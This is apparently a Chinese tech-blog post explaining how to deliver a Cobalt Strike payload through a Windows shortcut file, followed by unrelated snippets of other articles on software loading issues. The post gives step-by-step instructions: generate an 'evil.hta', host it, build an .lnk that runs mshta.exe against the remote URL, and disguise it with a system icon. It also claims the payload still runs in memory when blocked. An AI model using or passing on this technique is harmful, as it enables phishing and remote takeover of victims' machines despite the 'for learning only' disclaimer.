快捷方式(lnk)--加载HTA-CS上线

2024-06-22 02:04

本文主要是介绍快捷方式(lnk)--加载HTA-CS上线,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明:本文仅做技术交流与学习...

目录

CS:

HTA文档

 文件托管

借助mshta.exe突破

本地生成lnk快捷方式:

非系统图标路径不同问题:

关于lnk的上线问题:


CS:

HTA文档

配置监听器

有效载荷---->HTA文档--->选择监听器--->选择powershell模式---->

默认生成一个evil.hta文件到桌面吧~


 文件托管

站点管理--->文档托管

---->记录一下生成的网址--->

http://IP:83/download/file.ext


借助mshta.exe突破

 windows中的mshta,用于执行hta文件.

mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件.


本地生成lnk快捷方式:

C:\Windows\System32\mshta.exe http://IP:83/download/file.ext

名字随便取好吧~

 生成之后,右键属性,更改图标等等

windows系统自带的图标目录:

C:\Windows\System32\shell32.dll

 

选一个吧,然后就OK了,执行--->上线.


非系统图标路径不同问题:

所以还是最好用系统图标.


关于lnk的上线问题:

1-就是个快捷方式----没毒


C:\Windows\System32\mshta.exe http://IP:83/download/file.ext

2-调用了系统的mshata程序----需要允许通过

3-文件为恶意文件被拦截---阻止也会上线----无文件落地,因为进入内存了!!!


这篇关于快捷方式(lnk)--加载HTA-CS上线的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1082978

相关文章

加载资源文件失败

背景         自己以前装了一个海康的深度学习算法平台,试用期是一个月,过了一个月之后,因为没有有效注册码或者加密狗的支持了导致无法使用,于是打算卸载掉,在卸载一个软件的时候,无论是使用控制面板还是软件自带的卸载功能,总是卸载不掉,提示“加载资源文件失败”。该软体主要包括以下两部分: 用自带卸载功能卸载的时候分别提示如下:     用控制面板卸载的时候反应很慢,最后也是提示这个

vue同页面多路由懒加载-及可能存在问题的解决方式

先上图,再解释 图一是多路由页面,图二是路由文件。从图一可以看出每个router-view对应的name都不一样。从图二可以看出层路由对应的组件加载方式要跟图一中的name相对应,并且图二的路由层在跟图一对应的页面中要加上components层,多一个s结尾,里面的的方法名就是图一路由的name值,里面还可以照样用懒加载的方式。 页面上其他的路由在路由文件中也跟图二是一样的写法。 附送可能存在

VS2012加载失败

1、通过命令提示行工具进入VS安装目录下的Common7\IDE 2、执行devenv.exe /setup /resetuserdata /resetsettings 3、重启VS

【服务器08】之【游戏框架】之【加载主角】

首先简单了解一下帧率 FixedUpdate( )   >   Update( )   >   LateUpdate( ) 首先FixedUpdate的设置值 默认一秒运行50次 虽然默认是0.02秒,但FiexedUpdate并不是真的0.02秒调用一次,因为在脚本的生命周期内,FixedUpdate有一个小循环,这个循环也是通过物理时间累计看是不是大于0.02了,然后调用一次。有

Web容器启动时加载Spring分析

在应用程序web.xml中做了以下配置信息时,当启动Web容器时就会自动加载Spring容器。 [java]  view plain copy print ? <listener>          <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>

Android 10.0 系统开机重启桌面时钟小部件widget加载慢解决方案

1.前言 在10.0的系统rom产品定制化开发中,在Launcher3桌面系统默认会有时钟widget小部件显示在首屏的,但是发现在开机过程 中会显示的好慢,等进入桌面了 还没显示,所以接下来分析下相关的源码流程,来实现相应的功能 2.系统开机重启桌面时钟小部件widget加载慢解决方案的核心类 frameworks\base\services\appwidget\java\com\andr

spring的bean加载

我们经常使用Spring,并且也都了解其大概原理。我想我们一定会对Spring源码的解读有迫切的渴望。 我也如此。所以,我打算阅读一下Spring的源码。再此之前,我也为此准备了很多。包括,去复习熟练java反射,理解常用的设计模式。当然,这些复习笔记也会在今后的复习中顺便记录在我的csdn博客。(当然,可能写的不好,也可能理解不正确(可以一起交流嘛)。但是乐于分享总归是好的。)

IE加载项的问题

问题描述: ie8 在网页中查看pdf文件,adobe xi已经安装了,但是在ie加载项中就是没有有关adobe的加载项,无缘无故消失了,后来通过资料查找,试了很多种方法都不见效,无意中发现ie打开的快捷方式 有-extoff参数设置,于是删除这个参数之后,加载项成功加载了。 解决方法: 首先得安装adobe相关软件,然后查看ie打开的快捷方式中是否有-extoff参数设置。

js预加载/延迟加载

js预加载/延迟加载  博客分类:  · javascript 浏览器面试Chrome腾讯jQuery  在面试中问道了问题,虽然也看过相关资料,但是还是需要增强和梳理下,这些方式出现的需求和实现上的区别。  Pre loader 预加载一般有两种常用方式:xhr和动态插入节点的方式。动态插入节点是最为简单也最为广泛的一种异步加载方式,然后使用动态插入节点方法加载的文件都会在加载后立即执

Android插件化学习之路(一)之动态加载综述

前段时间,公司项目完成了插件化的开发,自己也因此学习了很多Android插件化的知识,于是想把这些内容记录下来,本次带来Android插件化的第一篇:动态加载综述 Android插件化学习之路(一)之动态加载综述 Android插件化学习之路(二)之ClassLoader完全解析 Android插件化学习之路(三)之调用外部.dex文件中的代码 Android插件化学习之路(四)之使用插件中的R